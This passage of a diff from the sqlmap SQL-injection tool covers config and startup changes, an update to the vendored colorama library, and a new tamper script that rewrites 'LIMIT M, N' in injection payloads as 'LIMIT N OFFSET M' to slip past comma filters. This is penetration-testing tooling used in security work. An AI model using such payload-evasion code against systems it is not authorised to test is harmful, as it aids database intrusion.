warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
|
@ -320,6 +334,7 @@ class Entries:
|
|||
entries[column].append(value)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
|
|
@ -482,6 +482,9 @@ col =
|
|||
# Back-end database management system database table column(s) to not enumerate.
|
||||
excludeCol =
|
||||
|
||||
# Pivot column name.
|
||||
pivotColumn =
|
||||
|
||||
# Use WHERE condition while table dumping (e.g. "id=1").
|
||||
dumpWhere =
|
||||
|
||||
|
@ -650,6 +653,9 @@ trafficFile =
|
|||
# Valid: True or False
|
||||
batch = False
|
||||
|
||||
# Result fields having binary values (e.g. "digest").
|
||||
binaryFields =
|
||||
|
||||
# Force character encoding used for data retrieval.
|
||||
charset =
|
||||
|
||||
|
@ -697,9 +703,6 @@ outputDir =
|
|||
# Valid: True or False
|
||||
parseErrors = False
|
||||
|
||||
# Pivot column name.
|
||||
pivotColumn =
|
||||
|
||||
# Regular expression for filtering targets from provided Burp.
|
||||
# or WebScarab proxy log.
|
||||
# Example: (google|yahoo)
|
||||
|
|
21
sqlmap.py
21
sqlmap.py
|
@ -5,6 +5,12 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import sys
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
from lib.utils import versioncheck # this has to be the first non-standard import
|
||||
|
||||
import bdb
|
||||
import inspect
|
||||
import logging
|
||||
|
@ -17,13 +23,9 @@ import time
|
|||
import traceback
|
||||
import warnings
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
|
||||
warnings.filterwarnings(action="ignore", category=DeprecationWarning)
|
||||
|
||||
from lib.utils import versioncheck # this has to be the first non-standard import
|
||||
|
||||
from lib.controller.controller import start
|
||||
from lib.core.common import banner
|
||||
from lib.core.common import createGithubIssue
|
||||
|
@ -83,6 +85,7 @@ def main():
|
|||
raise SystemExit
|
||||
|
||||
setPaths()
|
||||
banner()
|
||||
|
||||
# Store original command line options for possible later restoration
|
||||
cmdLineOptions.update(cmdLineParser().__dict__)
|
||||
|
@ -95,8 +98,6 @@ def main():
|
|||
sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
|
||||
setRestAPILog()
|
||||
|
||||
banner()
|
||||
|
||||
conf.showTime = True
|
||||
dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
|
||||
dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)
|
||||
|
@ -173,6 +174,11 @@ def main():
|
|||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "_mkstemp_inner" in excMsg:
|
||||
errMsg = "there has been a problem while accessing temporary files"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("pymysql", "configparser")):
|
||||
errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
|
||||
logger.error(errMsg)
|
||||
|
@ -185,6 +191,9 @@ def main():
|
|||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"):
|
||||
raise SystemExit
|
||||
|
||||
for match in re.finditer(r'File "(.+?)", line', excMsg):
|
||||
file_ = match.group(1)
|
||||
file_ = os.path.relpath(file_, os.path.dirname(__file__))
|
||||
|
|
37
tamper/commalesslimit.py
Normal file
37
tamper/commalesslimit.py
Normal file
|
@ -0,0 +1,37 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.HIGH
|
||||
|
||||
def dependencies():
|
||||
pass
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
|
||||
|
||||
Requirement:
|
||||
* MySQL
|
||||
|
||||
Tested against:
|
||||
* MySQL 5.0 and 5.5
|
||||
|
||||
>>> tamper('LIMIT 2, 3')
|
||||
'LIMIT 3 OFFSET 2'
|
||||
"""
|
||||
|
||||
retVal = payload
|
||||
|
||||
match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
|
||||
if match:
|
||||
retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
|
||||
|
||||
return retVal
|
|
@ -5,10 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import base64
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
||||
__priority__ = PRIORITY.LOWEST
|
||||
|
||||
|
|
7
thirdparty/colorama/__init__.py
vendored
7
thirdparty/colorama/__init__.py
vendored
|
@ -0,0 +1,7 @@
|
|||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from .initialise import init, deinit, reinit, colorama_text
|
||||
from .ansi import Fore, Back, Style, Cursor
|
||||
from .ansitowin32 import AnsiToWin32
|
||||
|
||||
__version__ = '0.3.7'
|
||||
|
109
thirdparty/colorama/ansi.py
vendored
109
thirdparty/colorama/ansi.py
vendored
|
@ -1,49 +1,102 @@
|
|||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
'''
|
||||
This module generates ANSI character codes to printing colors to terminals.
|
||||
See: http://en.wikipedia.org/wiki/ANSI_escape_code
|
||||
'''
|
||||
|
||||
CSI = '\033['
|
||||
OSC = '\033]'
|
||||
BEL = '\007'
|
||||
|
||||
|
||||
def code_to_chars(code):
|
||||
return CSI + str(code) + 'm'
|
||||
|
||||
def set_title(title):
|
||||
return OSC + '2;' + title + BEL
|
||||
|
||||
def clear_screen(mode=2):
|
||||
return CSI + str(mode) + 'J'
|
||||
|
||||
def clear_line(mode=2):
|
||||
return CSI + str(mode) + 'K'
|
||||
|
||||
|
||||
class AnsiCodes(object):
|
||||
def __init__(self, codes):
|
||||
for name in dir(codes):
|
||||
def __init__(self):
|
||||
# the subclasses declare class attributes which are numbers.
|
||||
# Upon instantiation we define instance attributes, which are the same
|
||||
# as the class attributes but wrapped with the ANSI escape sequence
|
||||
for name in dir(self):
|
||||
if not name.startswith('_'):
|
||||
value = getattr(codes, name)
|
||||
value = getattr(self, name)
|
||||
setattr(self, name, code_to_chars(value))
|
||||
|
||||
class AnsiFore:
|
||||
BLACK = 30
|
||||
RED = 31
|
||||
GREEN = 32
|
||||
YELLOW = 33
|
||||
BLUE = 34
|
||||
MAGENTA = 35
|
||||
CYAN = 36
|
||||
WHITE = 37
|
||||
RESET = 39
|
||||
|
||||
class AnsiBack:
|
||||
BLACK = 40
|
||||
RED = 41
|
||||
GREEN = 42
|
||||
YELLOW = 43
|
||||
BLUE = 44
|
||||
MAGENTA = 45
|
||||
CYAN = 46
|
||||
WHITE = 47
|
||||
RESET = 49
|
||||
class AnsiCursor(object):
|
||||
def UP(self, n=1):
|
||||
return CSI + str(n) + 'A'
|
||||
def DOWN(self, n=1):
|
||||
return CSI + str(n) + 'B'
|
||||
def FORWARD(self, n=1):
|
||||
return CSI + str(n) + 'C'
|
||||
def BACK(self, n=1):
|
||||
return CSI + str(n) + 'D'
|
||||
def POS(self, x=1, y=1):
|
||||
return CSI + str(y) + ';' + str(x) + 'H'
|
||||
|
||||
class AnsiStyle:
|
||||
|
||||
class AnsiFore(AnsiCodes):
|
||||
BLACK = 30
|
||||
RED = 31
|
||||
GREEN = 32
|
||||
YELLOW = 33
|
||||
BLUE = 34
|
||||
MAGENTA = 35
|
||||
CYAN = 36
|
||||
WHITE = 37
|
||||
RESET = 39
|
||||
|
||||
# These are fairly well supported, but not part of the standard.
|
||||
LIGHTBLACK_EX = 90
|
||||
LIGHTRED_EX = 91
|
||||
LIGHTGREEN_EX = 92
|
||||
LIGHTYELLOW_EX = 93
|
||||
LIGHTBLUE_EX = 94
|
||||
LIGHTMAGENTA_EX = 95
|
||||
LIGHTCYAN_EX = 96
|
||||
LIGHTWHITE_EX = 97
|
||||
|
||||
|
||||
class AnsiBack(AnsiCodes):
|
||||
BLACK = 40
|
||||
RED = 41
|
||||
GREEN = 42
|
||||
YELLOW = 43
|
||||
BLUE = 44
|
||||
MAGENTA = 45
|
||||
CYAN = 46
|
||||
WHITE = 47
|
||||
RESET = 49
|
||||
|
||||
# These are fairly well supported, but not part of the standard.
|
||||
LIGHTBLACK_EX = 100
|
||||
LIGHTRED_EX = 101
|
||||
LIGHTGREEN_EX = 102
|
||||
LIGHTYELLOW_EX = 103
|
||||
LIGHTBLUE_EX = 104
|
||||
LIGHTMAGENTA_EX = 105
|
||||
LIGHTCYAN_EX = 106
|
||||
LIGHTWHITE_EX = 107
|
||||
|
||||
|
||||
class AnsiStyle(AnsiCodes):
|
||||
BRIGHT = 1
|
||||
DIM = 2
|
||||
NORMAL = 22
|
||||
RESET_ALL = 0
|
||||
|
||||
Fore = AnsiCodes( AnsiFore )
|
||||
Back = AnsiCodes( AnsiBack )
|
||||
Style = AnsiCodes( AnsiStyle )
|
||||
|
||||
Fore = AnsiFore()
|
||||
Back = AnsiBack()
|
||||
Style = AnsiStyle()
|
||||
Cursor = AnsiCursor()
|
||||
|
|
113
thirdparty/colorama/ansitowin32.py
vendored
113
thirdparty/colorama/ansitowin32.py
vendored
|
@ -1,16 +1,22 @@
|
|||
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import re
|
||||
import sys
|
||||
import os
|
||||
|
||||
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
|
||||
from .winterm import WinTerm, WinColor, WinStyle
|
||||
from .win32 import windll
|
||||
from .win32 import windll, winapi_test
|
||||
|
||||
|
||||
winterm = None
|
||||
if windll is not None:
|
||||
winterm = WinTerm()
|
||||
|
||||
|
||||
def is_stream_closed(stream):
|
||||
return not hasattr(stream, 'closed') or stream.closed
|
||||
|
||||
|
||||
def is_a_tty(stream):
|
||||
return hasattr(stream, 'isatty') and stream.isatty()
|
||||
|
||||
|
@ -40,7 +46,8 @@ class AnsiToWin32(object):
|
|||
sequences from the text, and if outputting to a tty, will convert them into
|
||||
win32 function calls.
|
||||
'''
|
||||
ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
|
||||
ANSI_CSI_RE = re.compile('\001?\033\[((?:\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer
|
||||
ANSI_OSC_RE = re.compile('\001?\033\]((?:.|;)*?)(\x07)\002?') # Operating System Command
|
||||
|
||||
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
|
||||
# The wrapped stream (normally sys.stdout or sys.stderr)
|
||||
|
@ -52,16 +59,21 @@ class AnsiToWin32(object):
|
|||
# create the proxy wrapping our output stream
|
||||
self.stream = StreamWrapper(wrapped, self)
|
||||
|
||||
on_windows = sys.platform.startswith('win')
|
||||
on_windows = os.name == 'nt'
|
||||
# We test if the WinAPI works, because even if we are on Windows
|
||||
# we may be using a terminal that doesn't support the WinAPI
|
||||
# (e.g. Cygwin Terminal). In this case it's up to the terminal
|
||||
# to support the ANSI codes.
|
||||
conversion_supported = on_windows and winapi_test()
|
||||
|
||||
# should we strip ANSI sequences from our output?
|
||||
if strip is None:
|
||||
strip = on_windows
|
||||
strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped))
|
||||
self.strip = strip
|
||||
|
||||
# should we should convert ANSI sequences into win32 calls?
|
||||
if convert is None:
|
||||
convert = on_windows and is_a_tty(wrapped)
|
||||
convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped)
|
||||
self.convert = convert
|
||||
|
||||
# dict of ansi codes to win32 functions and parameters
|
||||
|
@ -70,7 +82,6 @@ class AnsiToWin32(object):
|
|||
# are we wrapping stderr?
|
||||
self.on_stderr = self.wrapped is sys.stderr
|
||||
|
||||
|
||||
def should_wrap(self):
|
||||
'''
|
||||
True if this class is actually needed. If false, then the output
|
||||
|
@ -81,7 +92,6 @@ class AnsiToWin32(object):
|
|||
'''
|
||||
return self.convert or self.strip or self.autoreset
|
||||
|
||||
|
||||
def get_win32_calls(self):
|
||||
if self.convert and winterm:
|
||||
return {
|
||||
|
@ -98,6 +108,14 @@ class AnsiToWin32(object):
|
|||
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
|
||||
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
|
||||
AnsiFore.RESET: (winterm.fore, ),
|
||||
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
|
||||
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
|
||||
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
|
||||
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
|
||||
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
|
||||
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
|
||||
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
|
||||
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
|
||||
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
|
||||
AnsiBack.RED: (winterm.back, WinColor.RED),
|
||||
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
|
||||
|
@ -107,8 +125,16 @@ class AnsiToWin32(object):
|
|||
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
|
||||
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
|
||||
AnsiBack.RESET: (winterm.back, ),
|
||||
AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
|
||||
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
|
||||
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
|
||||
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
|
||||
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
|
||||
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
|
||||
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
|
||||
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
|
||||
}
|
||||
|
||||
return dict()
|
||||
|
||||
def write(self, text):
|
||||
if self.strip or self.convert:
|
||||
|
@ -123,7 +149,7 @@ class AnsiToWin32(object):
|
|||
def reset_all(self):
|
||||
if self.convert:
|
||||
self.call_win32('m', (0,))
|
||||
elif is_a_tty(self.wrapped):
|
||||
elif not self.strip and not is_stream_closed(self.wrapped):
|
||||
self.wrapped.write(Style.RESET_ALL)
|
||||
|
||||
|
||||
|
@ -134,7 +160,8 @@ class AnsiToWin32(object):
|
|||
calls.
|
||||
'''
|
||||
cursor = 0
|
||||
for match in self.ANSI_RE.finditer(text):
|
||||
text = self.convert_osc(text)
|
||||
for match in self.ANSI_CSI_RE.finditer(text):
|
||||
start, end = match.span()
|
||||
self.write_plain_text(text, cursor, start)
|
||||
self.convert_ansi(*match.groups())
|
||||
|
@ -150,21 +177,29 @@ class AnsiToWin32(object):
|
|||
|
||||
def convert_ansi(self, paramstring, command):
|
||||
if self.convert:
|
||||
params = self.extract_params(paramstring)
|
||||
params = self.extract_params(command, paramstring)
|
||||
self.call_win32(command, params)
|
||||
|
||||
|
||||
def extract_params(self, paramstring):
|
||||
def split(paramstring):
|
||||
for p in paramstring.split(';'):
|
||||
if p != '':
|
||||
yield int(p)
|
||||
return tuple(split(paramstring))
|
||||
def extract_params(self, command, paramstring):
|
||||
if command in 'Hf':
|
||||
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
|
||||
while len(params) < 2:
|
||||
# defaults:
|
||||
params = params + (1,)
|
||||
else:
|
||||
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
|
||||
if len(params) == 0:
|
||||
# defaults:
|
||||
if command in 'JKm':
|
||||
params = (0,)
|
||||
elif command in 'ABCD':
|
||||
params = (1,)
|
||||
|
||||
return params
|
||||
|
||||
|
||||
def call_win32(self, command, params):
|
||||
if params == []:
|
||||
params = [0]
|
||||
if command == 'm':
|
||||
for param in params:
|
||||
if param in self.win32_calls:
|
||||
|
@ -173,17 +208,29 @@ class AnsiToWin32(object):
|
|||
args = func_args[1:]
|
||||
kwargs = dict(on_stderr=self.on_stderr)
|
||||
func(*args, **kwargs)
|
||||
elif command in ('H', 'f'): # set cursor position
|
||||
func = winterm.set_cursor_position
|
||||
func(params, on_stderr=self.on_stderr)
|
||||
elif command in ('J'):
|
||||
func = winterm.erase_data
|
||||
func(params, on_stderr=self.on_stderr)
|
||||
elif command == 'A':
|
||||
if params == () or params == None:
|
||||
num_rows = 1
|
||||
else:
|
||||
num_rows = params[0]
|
||||
func = winterm.cursor_up
|
||||
func(num_rows, on_stderr=self.on_stderr)
|
||||
elif command in 'J':
|
||||
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
|
||||
elif command in 'K':
|
||||
winterm.erase_line(params[0], on_stderr=self.on_stderr)
|
||||
elif command in 'Hf': # cursor position - absolute
|
||||
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
|
||||
elif command in 'ABCD': # cursor position - relative
|
||||
n = params[0]
|
||||
# A - up, B - down, C - forward, D - back
|
||||
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
|
||||
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
|
||||
|
||||
|
||||
def convert_osc(self, text):
|
||||
for match in self.ANSI_OSC_RE.finditer(text):
|
||||
start, end = match.span()
|
||||
text = text[:start] + text[end:]
|
||||
paramstring, command = match.groups()
|
||||
if command in '\x07': # \x07 = BEL
|
||||
params = paramstring.split(";")
|
||||
# 0 - change title and icon (we will only change title)
|
||||
# 1 - change icon (we don't support this)
|
||||
# 2 - change title
|
||||
if params[0] in '02':
|
||||
winterm.set_title(params[1])
|
||||
return text
|
||||
|
|
62
thirdparty/colorama/initialise.py
vendored
62
thirdparty/colorama/initialise.py
vendored
|
@ -1,32 +1,48 @@
|
|||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import atexit
|
||||
import contextlib
|
||||
import sys
|
||||
|
||||
from .ansitowin32 import AnsiToWin32
|
||||
|
||||
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
orig_stdout = None
|
||||
orig_stderr = None
|
||||
|
||||
wrapped_stdout = sys.stdout
|
||||
wrapped_stderr = sys.stderr
|
||||
wrapped_stdout = None
|
||||
wrapped_stderr = None
|
||||
|
||||
atexit_done = False
|
||||
|
||||
|
||||
def reset_all():
|
||||
AnsiToWin32(orig_stdout).reset_all()
|
||||
if AnsiToWin32 is not None: # Issue #74: objects might become None at exit
|
||||
AnsiToWin32(orig_stdout).reset_all()
|
||||
|
||||
|
||||
def init(autoreset=False, convert=None, strip=None, wrap=True):
|
||||
global wrapped_stdout, wrapped_stderr
|
||||
global orig_stdout, orig_stderr
|
||||
|
||||
if orig_stdout is not None:
|
||||
return
|
||||
|
||||
if not wrap and any([autoreset, convert, strip]):
|
||||
raise ValueError('wrap=False conflicts with any other arg=True')
|
||||
|
||||
global wrapped_stdout, wrapped_stderr
|
||||
sys.stdout = wrapped_stdout = \
|
||||
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
|
||||
sys.stderr = wrapped_stderr = \
|
||||
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
|
||||
if sys.stdout is None:
|
||||
wrapped_stdout = None
|
||||
else:
|
||||
sys.stdout = wrapped_stdout = \
|
||||
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
|
||||
if sys.stderr is None:
|
||||
wrapped_stderr = None
|
||||
else:
|
||||
sys.stderr = wrapped_stderr = \
|
||||
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
|
||||
|
||||
global atexit_done
|
||||
if not atexit_done:
|
||||
|
@ -35,13 +51,31 @@ def init(autoreset=False, convert=None, strip=None, wrap=True):
|
|||
|
||||
|
||||
def deinit():
|
||||
sys.stdout = orig_stdout
|
||||
sys.stderr = orig_stderr
|
||||
global orig_stdout
|
||||
global orig_stderr
|
||||
|
||||
if orig_stdout is not None:
|
||||
sys.stdout = orig_stdout
|
||||
orig_stdout = None
|
||||
if orig_stderr is not None:
|
||||
sys.stderr = orig_stderr
|
||||
orig_stderr = None
|
||||
|
||||
|
||||
@contextlib.contextmanager
|
||||
def colorama_text(*args, **kwargs):
|
||||
init(*args, **kwargs)
|
||||
try:
|
||||
yield
|
||||
finally:
|
||||
deinit()
|
||||
|
||||
|
||||
def reinit():
|
||||
sys.stdout = wrapped_stdout
|
||||
sys.stderr = wrapped_stdout
|
||||
if wrapped_stdout is not None:
|
||||
sys.stdout = wrapped_stdout
|
||||
if wrapped_stderr is not None:
|
||||
sys.stderr = wrapped_stderr
|
||||
|
||||
|
||||
def wrap_stream(stream, convert, strip, autoreset, wrap):
|
||||
|
|
145
thirdparty/colorama/win32.py
vendored
145
thirdparty/colorama/win32.py
vendored
|
@ -1,51 +1,30 @@
|
|||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
|
||||
# from winbase.h
|
||||
STDOUT = -11
|
||||
STDERR = -12
|
||||
|
||||
try:
|
||||
from ctypes import windll
|
||||
except ImportError:
|
||||
import ctypes
|
||||
from ctypes import LibraryLoader
|
||||
windll = LibraryLoader(ctypes.WinDLL)
|
||||
from ctypes import wintypes
|
||||
except (AttributeError, ImportError):
|
||||
windll = None
|
||||
SetConsoleTextAttribute = lambda *_: None
|
||||
winapi_test = lambda *_: None
|
||||
else:
|
||||
from ctypes import (
|
||||
byref, Structure, c_char, c_short, c_uint32, c_ushort
|
||||
)
|
||||
from ctypes import byref, Structure, c_char, POINTER
|
||||
|
||||
handles = {
|
||||
STDOUT: windll.kernel32.GetStdHandle(STDOUT),
|
||||
STDERR: windll.kernel32.GetStdHandle(STDERR),
|
||||
}
|
||||
|
||||
SHORT = c_short
|
||||
WORD = c_ushort
|
||||
DWORD = c_uint32
|
||||
TCHAR = c_char
|
||||
|
||||
class COORD(Structure):
|
||||
"""struct in wincon.h"""
|
||||
_fields_ = [
|
||||
('X', SHORT),
|
||||
('Y', SHORT),
|
||||
]
|
||||
|
||||
class SMALL_RECT(Structure):
|
||||
"""struct in wincon.h."""
|
||||
_fields_ = [
|
||||
("Left", SHORT),
|
||||
("Top", SHORT),
|
||||
("Right", SHORT),
|
||||
("Bottom", SHORT),
|
||||
]
|
||||
COORD = wintypes._COORD
|
||||
|
||||
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
|
||||
"""struct in wincon.h."""
|
||||
_fields_ = [
|
||||
("dwSize", COORD),
|
||||
("dwCursorPosition", COORD),
|
||||
("wAttributes", WORD),
|
||||
("srWindow", SMALL_RECT),
|
||||
("wAttributes", wintypes.WORD),
|
||||
("srWindow", wintypes.SMALL_RECT),
|
||||
("dwMaximumWindowSize", COORD),
|
||||
]
|
||||
def __str__(self):
|
||||
|
@ -57,20 +36,83 @@ else:
|
|||
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
|
||||
)
|
||||
|
||||
_GetStdHandle = windll.kernel32.GetStdHandle
|
||||
_GetStdHandle.argtypes = [
|
||||
wintypes.DWORD,
|
||||
]
|
||||
_GetStdHandle.restype = wintypes.HANDLE
|
||||
|
||||
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
|
||||
_GetConsoleScreenBufferInfo.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
|
||||
]
|
||||
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
|
||||
_SetConsoleTextAttribute.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
wintypes.WORD,
|
||||
]
|
||||
_SetConsoleTextAttribute.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
|
||||
_SetConsoleCursorPosition.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
COORD,
|
||||
]
|
||||
_SetConsoleCursorPosition.restype = wintypes.BOOL
|
||||
|
||||
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
|
||||
_FillConsoleOutputCharacterA.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
c_char,
|
||||
wintypes.DWORD,
|
||||
COORD,
|
||||
POINTER(wintypes.DWORD),
|
||||
]
|
||||
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
|
||||
|
||||
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
|
||||
_FillConsoleOutputAttribute.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
wintypes.WORD,
|
||||
wintypes.DWORD,
|
||||
COORD,
|
||||
POINTER(wintypes.DWORD),
|
||||
]
|
||||
_FillConsoleOutputAttribute.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
|
||||
_SetConsoleTitleW.argtypes = [
|
||||
wintypes.LPCSTR
|
||||
]
|
||||
_SetConsoleTitleW.restype = wintypes.BOOL
|
||||
|
||||
handles = {
|
||||
STDOUT: _GetStdHandle(STDOUT),
|
||||
STDERR: _GetStdHandle(STDERR),
|
||||
}
|
||||
|
||||
def winapi_test():
|
||||
handle = handles[STDOUT]
|
||||
csbi = CONSOLE_SCREEN_BUFFER_INFO()
|
||||
success = _GetConsoleScreenBufferInfo(
|
||||
handle, byref(csbi))
|
||||
return bool(success)
|
||||
|
||||
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
|
||||
handle = handles[stream_id]
|
||||
csbi = CONSOLE_SCREEN_BUFFER_INFO()
|
||||
success = windll.kernel32.GetConsoleScreenBufferInfo(
|
||||
success = _GetConsoleScreenBufferInfo(
|
||||
handle, byref(csbi))
|
||||
return csbi
|
||||
|
||||
|
||||
def SetConsoleTextAttribute(stream_id, attrs):
|
||||
handle = handles[stream_id]
|
||||
return windll.kernel32.SetConsoleTextAttribute(handle, attrs)
|
||||
return _SetConsoleTextAttribute(handle, attrs)
|
||||
|
||||
|
||||
def SetConsoleCursorPosition(stream_id, position):
|
||||
def SetConsoleCursorPosition(stream_id, position, adjust=True):
|
||||
position = COORD(*position)
|
||||
# If the position is out of range, do nothing.
|
||||
if position.Y <= 0 or position.X <= 0:
|
||||
|
@ -79,31 +121,34 @@ else:
|
|||
# 1. being 0-based, while ANSI is 1-based.
|
||||
# 2. expecting (x,y), while ANSI uses (y,x).
|
||||
adjusted_position = COORD(position.Y - 1, position.X - 1)
|
||||
# Adjust for viewport's scroll position
|
||||
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
|
||||
adjusted_position.Y += sr.Top
|
||||
adjusted_position.X += sr.Left
|
||||
if adjust:
|
||||
# Adjust for viewport's scroll position
|
||||
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
|
||||
adjusted_position.Y += sr.Top
|
||||
adjusted_position.X += sr.Left
|
||||
# Resume normal processing
|
||||
handle = handles[stream_id]
|
||||
return windll.kernel32.SetConsoleCursorPosition(handle, adjusted_position)
|
||||
return _SetConsoleCursorPosition(handle, adjusted_position)
|
||||
|
||||
def FillConsoleOutputCharacter(stream_id, char, length, start):
|
||||
handle = handles[stream_id]
|
||||
char = TCHAR(char)
|
||||
length = DWORD(length)
|
||||
num_written = DWORD(0)
|
||||
char = c_char(char.encode())
|
||||
length = wintypes.DWORD(length)
|
||||
num_written = wintypes.DWORD(0)
|
||||
# Note that this is hard-coded for ANSI (vs wide) bytes.
|
||||
success = windll.kernel32.FillConsoleOutputCharacterA(
|
||||
success = _FillConsoleOutputCharacterA(
|
||||
handle, char, length, start, byref(num_written))
|
||||
return num_written.value
|
||||
|
||||
def FillConsoleOutputAttribute(stream_id, attr, length, start):
|
||||
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
|
||||
handle = handles[stream_id]
|
||||
attribute = WORD(attr)
|
||||
length = DWORD(length)
|
||||
num_written = DWORD(0)
|
||||
attribute = wintypes.WORD(attr)
|
||||
length = wintypes.DWORD(length)
|
||||
num_written = wintypes.DWORD(0)
|
||||
# Note that this is hard-coded for ANSI (vs wide) bytes.
|
||||
return windll.kernel32.FillConsoleOutputAttribute(
|
||||
return _FillConsoleOutputAttribute(
|
||||
handle, attribute, length, start, byref(num_written))
|
||||
|
||||
def SetConsoleTitle(title):
|
||||
return _SetConsoleTitleW(title)
|
||||
|
|
104
thirdparty/colorama/winterm.py
vendored
104
thirdparty/colorama/winterm.py
vendored
|
@ -1,4 +1,4 @@
|
|||
|
||||
